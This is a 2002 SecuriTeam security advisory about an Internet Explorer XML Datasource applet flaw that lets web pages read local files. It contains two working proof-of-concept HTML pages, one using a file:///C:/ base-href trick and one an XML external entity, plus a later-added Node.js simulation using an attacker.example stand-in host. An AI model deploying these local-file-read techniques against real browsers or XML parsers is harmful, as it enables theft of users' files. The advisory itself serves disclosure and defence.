[NT] Internet Explorer Can Read Local Files (XML Datasource)
From: support@securiteam.com To: list@securiteam.com Date: Mon, 19 Aug 2002 15:09:13 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Internet Explorer Can Read Local Files (XML Datasource)
------------------------------------------------------------------------
SUMMARY
There is a bug in Internet Explorer that lets a web page read local files
and send their contents elsewhere. The problem lies in a legacy XML
Datasource applet (com.ms.xml.dso.XMLDSO) that has shipped with Internet
Explorer since its 4.0 release.
DETAILS
The applet is embedded in a page like this:
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0"
id="xmldso" MAYSCRIPT="true">
</applet>
If you add a <base href="file:///C:/"> tag to the head section, the applet
believes its codebase is local and lets you read local XML files. The
following snippet therefore reads c:\jelmer.xml:
<html>
<head>
<!-- Makes the applet treat file:///C:/ as its codebase -->
<base href="file:///C:/">
</head>
<body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="100%" height="50"
id="xmldso" MAYSCRIPT="true">
<!-- Relative to the base href above, this resolves to file:///C:/jelmer.xml -->
<PARAM NAME="url" VALUE="jelmer.xml">
</applet>
<script language="javascript">
// Give the applet time to load the file, then read the document back
// through the MAYSCRIPT interface and display its text
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>
Reading local XML files is bad enough, but more can be done. XML has a
feature called external entities that lets one document pull the contents
of other files into itself. This lets us read plain text files as well, as
the following example shows. (The included file has to parse as well-formed
character data: a file containing stray < or & characters makes the parser
fail instead of returning the contents.)
<html>
<head>
<base href="file:///C:/">
</head>
<body>
<!-- The XML document is supplied inline as the applet's content. Its DTD
     declares an external entity whose SYSTEM identifier points at a local
     text file; the parser substitutes that file's contents for &contents;
     when it builds the document -->
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0"
id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
<!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
]>
<file>
&contents;
</file>
</applet>
<script language="javascript">
// As before: wait for the applet, then read back the expanded document
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>
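To make both tricks concrete, here is an added example written for this writeup (it is not code from the advisory, from Jelmer, or from Microsoft): a small Node.js model of a data-source applet deciding which URLs it may load. It shows the two decisions behind the bug described above: deriving the applet's origin from the page's <base href> instead of from the URL the applet class was really loaded from, and expanding <!ENTITY ... SYSTEM "..."> declarations without putting each target through the same origin check. The attacker.example host, the file contents, and the loadDataSource/expandExternalEntities functions are all constructed for illustration; nothing is read from disk or the network.

```javascript
// Added example, not part of the original advisory. All URLs and file
// contents are constructed sample data.

// Constructed fake local disk (the victim's C:) and fake attacker web server.
const FAKE_FILESYSTEM = {
  "file:///C:/jelmer.xml": "<note>contents of c:\\jelmer.xml</note>",
  "file:///C:/jelmer.txt": "contents of c:\\jelmer.txt",
};
const FAKE_WEB = {
  // Legitimate remote document whose entity lives on the same server.
  "http://attacker.example/data.xml":
    '<?xml version="1.0"?><!DOCTYPE d [ <!ENTITY part SYSTEM "part.txt"> ]><d>&part;</d>',
  "http://attacker.example/part.txt": "remote fragment",
  // Remote document that points an entity at the victim's disk.
  "http://attacker.example/xxe.xml":
    '<?xml version="1.0"?><!DOCTYPE f [ <!ENTITY c SYSTEM "file:///C:/jelmer.txt"> ]><f>&c;</f>',
};

// Look a URL up in the fake stores; anything else is "not found".
function fetchUrl(url) {
  const key = new URL(url).href;
  if (key in FAKE_FILESYSTEM) return FAKE_FILESYSTEM[key];
  if (key in FAKE_WEB) return FAKE_WEB[key];
  throw new Error("not found: " + key);
}

// Origin used for access decisions. WHATWG reports "null" for file: URLs,
// so the whole file: scheme is treated as one origin, which is what matters here.
function originOf(url) {
  const u = new URL(url);
  return u.protocol === "file:" ? "file:" : u.origin;
}

// Expand SYSTEM entities declared in the internal DTD subset. Each target is
// resolved relative to docUrl and must pass `allowed` before it is fetched.
function expandExternalEntities(xml, docUrl, allowed) {
  const decl = /<!ENTITY\s+(\w+)\s+SYSTEM\s+"([^"]+)"\s*>/g;
  const entities = {};
  let m;
  while ((m = decl.exec(xml)) !== null) {
    const target = new URL(m[2], docUrl).href;
    if (!allowed(target)) throw new Error("blocked entity target " + target);
    entities[m[1]] = fetchUrl(target);
  }
  const body = xml.replace(/<\?xml[^>]*\?>/, "").replace(/<!DOCTYPE[\s\S]*?\]>/, "");
  return body.replace(/&(\w+);/g, (ref, name) => (name in entities ? entities[name] : ref));
}

// Model of the applet. `codebase` is where the applet class was really loaded
// from; `baseHref` is the page's <base href>. With trustBaseHref = true the
// applet's origin comes from baseHref, reproducing the behaviour the advisory
// describes; with false it comes from codebase (the hardened behaviour).
function loadDataSource({ codebase, baseHref, urlParam, inlineXml, trustBaseHref }) {
  const origin = originOf(trustBaseHref ? baseHref : codebase);
  const allowed = (target) => originOf(target) === origin;
  let docUrl, xml;
  if (inlineXml !== undefined) {
    docUrl = baseHref; // inline data resolves relative URIs against the page base
    xml = inlineXml;
  } else {
    docUrl = new URL(urlParam, baseHref).href; // relative url= resolves against <base href>
    if (!allowed(docUrl)) throw new Error("blocked document " + docUrl);
    xml = fetchUrl(docUrl);
  }
  return expandExternalEntities(xml, docUrl, allowed);
}

// Payload 1 from the advisory: url="jelmer.xml" with <base href="file:///C:/">.
const payload1 = { codebase: "http://attacker.example/", baseHref: "file:///C:/", urlParam: "jelmer.xml" };
// Payload 2: inline XML whose external entity points at file:///C:/jelmer.txt.
const payload2 = {
  codebase: "http://attacker.example/", baseHref: "file:///C:/",
  inlineXml: '<?xml version="1.0"?><!DOCTYPE file [ <!ENTITY contents SYSTEM "file:///C:/jelmer.txt"> ]><file>&contents;</file>',
};
// Hardened applet, no <base> trick: one honest remote document, one remote XXE attempt.
const legitimateRemote = { codebase: "http://attacker.example/", baseHref: "http://attacker.example/", urlParam: "data.xml", trustBaseHref: false };
const remoteXxe = { codebase: "http://attacker.example/", baseHref: "http://attacker.example/", urlParam: "xxe.xml", trustBaseHref: false };

// Return the loaded document, or a DENIED string carrying the policy error.
function tryLoad(opts) {
  try { return loadDataSource(opts); } catch (e) { return "DENIED: " + e.message; }
}

console.log(tryLoad({ ...payload1, trustBaseHref: true }));  // leaks c:\jelmer.xml
console.log(tryLoad({ ...payload1, trustBaseHref: false })); // DENIED: blocked document
console.log(tryLoad({ ...payload2, trustBaseHref: true }));  // leaks c:\jelmer.txt
console.log(tryLoad({ ...payload2, trustBaseHref: false })); // DENIED: blocked entity target
console.log(tryLoad(legitimateRemote));                      // <d>remote fragment</d>
console.log(tryLoad(remoteXxe));                             // DENIED: blocked entity target
```

Run it with node. The first two calls replay the advisory's payloads against the vulnerable policy and come back with the fake local files; the hardened policy denies both. The last two calls show that the same-origin rule still permits an ordinary remote document with an entity on its own server while blocking a remote document that aims an entity at file:, so the entity check matters even once the <base href> trust is fixed. The model follows the advisory's description rather than the applet's actual source, and a real parser also has to guard against parameter entities, nested expansion and external DTD subsets, none of which this toy handles.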
Demonstration:
A demonstration of the issue described is available at:
http://www.xs4all.nl/~jkuperus/msieread.htm
(NOTE: this demonstration will try to read and display the contents of
c:\jelmer.txt)
Vendor status:
Microsoft was notified on 17 August; Jelmer has yet to receive a reply.
Workaround:
Disable Java altogether, or install the Sun JDK, which does not appear to
be affected (the com.ms.xml classes belong to the Microsoft VM and are not
part of Sun's runtime):
http://www.webdeveloper.com/html/html_xml_3.html
ADDITIONAL INFORMATION
The information has been provided by Jelmer <jelmer@kuperus.xs4all.nl>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.